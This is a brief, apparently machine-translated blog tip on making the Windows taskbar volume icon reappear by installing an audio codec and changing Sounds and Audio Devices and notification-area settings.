Volume or the speaker icon in the taskbar, exactly in the notification area is useful for computer audio volume settings. With the volume icon in the taskbar, you do not need to open the computers audio volume settings through the control panel, so you can save time. With the volume icon in the taskbar can also be used as one indicator that the audio is going well. In some cases the computer can not make a sound because the volume or the speaker icon is not active and does not appear.
One cause of the computer can not make a sound or audio is not their installed audio codecs. For that you must install first codecnya like relatec AC97 audio, etc.. You can download an audio codec on ​​his official website, please aja mbah browsing in google. Usually after audio codecnya installed, it automatically or speaker volume icon will appear in the taskbar.

If the audio is OK, but the speaker or the volume control icon does not appear in the taskbar, you can display the speaker icon in the following manner:
  • Open the Control Panel and then double-click on Sounds and Audio devices
  • In the window that appears select the volume tab and check the Place volume icon in the taskbar and Click OK.
 
Addition to the above, sometimes setting the volume icon in the taskbar is set hidden so it does not appear in the taskbar. Shobat can change it to always show in the notification area settings.
  • Right click on start then select properties
  • Select the Taskbar tab and then click customize in the notification area option
  • Change the setting of always show or hide to always hide inactive then click OK
With the above arrangement, should the volume control or speaker icon has appeared in the taskbar.
Read More..